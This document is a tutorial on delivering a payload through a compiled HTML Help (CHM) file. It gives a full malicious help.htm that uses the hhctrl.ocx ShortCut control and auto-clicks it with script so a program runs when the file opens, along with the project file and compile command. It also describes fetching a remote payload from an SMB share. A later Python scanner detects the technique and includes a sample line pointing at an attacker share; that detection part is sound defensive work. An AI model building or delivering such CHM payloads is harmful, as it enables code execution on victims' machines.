Payload Delivery using CHM file

Create the malicious HTML file help.htm. The page embeds the HTML Help ActiveX control (hhctrl.ocx, classid adb880a6-d8ff-11cf-9377-00aa003b7a11) with the ShortCut command, and the inline script clicks it as soon as the topic loads, so the program named in Item1 runs when the CHM is opened.


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<html>

<head>
<meta http-equiv="Content-Type"
content="text/html; charset=iso-8859-1">
<meta name="GENERATOR" content="Microsoft HTML Help Workshop 4.0">
<title>Monitoring help messages</title>
</head>

<body>

<h1>Monitoring help messages
</h1>

<p>You can view help messages to troubleshoot context-sensitive help. Help messages contain the text of each HTML Help API call that is made. Each time you activate context sensitive help in your application, a new message appears including parameters such as the topic ID, text file, and compiled help file that were referenced in the call. These messages can be saved as a text file.
</p>

<h4>What do you want to do?</h4>

<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap::shortcut">
<PARAM name="Item1" value=',explorer.exe,C:\Windows\System32\notepad.exe'>
<PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>

</body>
</html>

Create the help.hhp project file, which names the compiled output and lists the topic file to include:

[OPTIONS]
Compiled file=help.chm

[FILES]
help.htm

Download and install the Microsoft HTML Help Workshop and Documentation (it ships the compiler, hhc.exe).

Put both files (help.htm and help.hhp) in the same folder.

Now, from the directory containing the files, run "C:\Program Files (x86)\HTML Help Workshop\hhc.exe" help.hhp to produce help.chm.


When the compiled help.chm is opened, a warning window pops up.
On clicking Yes, we see that our command (notepad.exe, launched through explorer.exe) gets executed.

The launched program is whatever Item1 names: explorer.exe can be pointed at an SMB share (a UNC path) to fetch a remote payload, or a different command can be run directly. Change the Item1 value depending on the use case:

<PARAM name="Item1" value=',explorer.exe,C:\Windows\System32\notepad.exe'>
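From the defender's side, the tell-tale of this technique is an <OBJECT> bound to the hhctrl.ocx CLSID with Command=ShortCut and an Item1 that names a program, usually paired with a script that calls .Click() on it. The following scanner is an added example written for this page, not code from the original post: it parses a topic file (the same HTML as above plus a constructed SMB-share variant) and reports each ShortCut launch, splitting Item1 into its window, program and parameter fields (that three-field layout is an assumption based on the value used on this page) and flagging UNC paths and automatic clicks.

```python
import re
from html.parser import HTMLParser

# CLSID of the HTML Help ActiveX control (hhctrl.ocx) used in the page's <OBJECT> tag.
HHCTRL_CLSID = "adb880a6-d8ff-11cf-9377-00aa003b7a11"

# Constructed sample: the page's help.htm body plus a second object whose
# parameter is a UNC path (the "SMB share with file explorer" variant).
SAMPLE_HTM = r'''<html><body>
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap::shortcut">
<PARAM name="Item1" value=',explorer.exe,C:\Windows\System32\notepad.exe'>
<PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>
<OBJECT id=y classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Item1" value=',explorer.exe,\\attacker\share\tool.exe'>
<PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>y.Click();</SCRIPT>
</body></html>'''


class ShortcutObjectParser(HTMLParser):
    """Collect every <OBJECT> element together with its <PARAM> name/value pairs."""

    def __init__(self):
        super().__init__()
        self.objects = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        attrs = {k.lower(): (v or "") for k, v in attrs}
        if tag == "object":
            self._current = {"id": attrs.get("id", ""),
                             "classid": attrs.get("classid", "").lower(),
                             "params": {}}
        elif tag == "param" and self._current is not None:
            # <PARAM> has no closing tag; attach it to the open <OBJECT>.
            self._current["params"][attrs.get("name", "").lower()] = attrs.get("value", "")

    def handle_endtag(self, tag):
        if tag == "object" and self._current is not None:
            self.objects.append(self._current)
            self._current = None


def parse_item1(value):
    """Split Item1 into window, program, parameters (assumed 'window,program,params' layout)."""
    parts = value.split(",", 2)
    while len(parts) < 3:
        parts.append("")
    window, program, params = (p.strip() for p in parts)
    return {"window": window, "program": program, "params": params}


def find_shortcut_launches(html_text):
    """Return one finding per hhctrl.ocx ShortCut object found in the topic HTML."""
    parser = ShortcutObjectParser()
    parser.feed(html_text)
    findings = []
    for obj in parser.objects:
        if HHCTRL_CLSID not in obj["classid"]:
            continue
        if obj["params"].get("command", "").lower() != "shortcut":
            continue
        item = parse_item1(obj["params"].get("item1", ""))
        item["object_id"] = obj["id"]
        # UNC path in program or parameters means the payload is fetched over SMB.
        item["remote"] = item["program"].startswith("\\\\") or item["params"].startswith("\\\\")
        # A script calling <id>.Click() fires the shortcut without user interaction.
        pattern = r"\b" + re.escape(obj["id"]) + r"\s*\.\s*Click\s*\("
        item["auto_click"] = bool(obj["id"]) and re.search(pattern, html_text) is not None
        findings.append(item)
    return findings


if __name__ == "__main__":
    for f in find_shortcut_launches(SAMPLE_HTM):
        print(f)
```

Run against a decompiled CHM (hh.exe -decompile extracts the topic files) this gives a quick triage of what the help file would launch and whether it reaches out to a network share.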
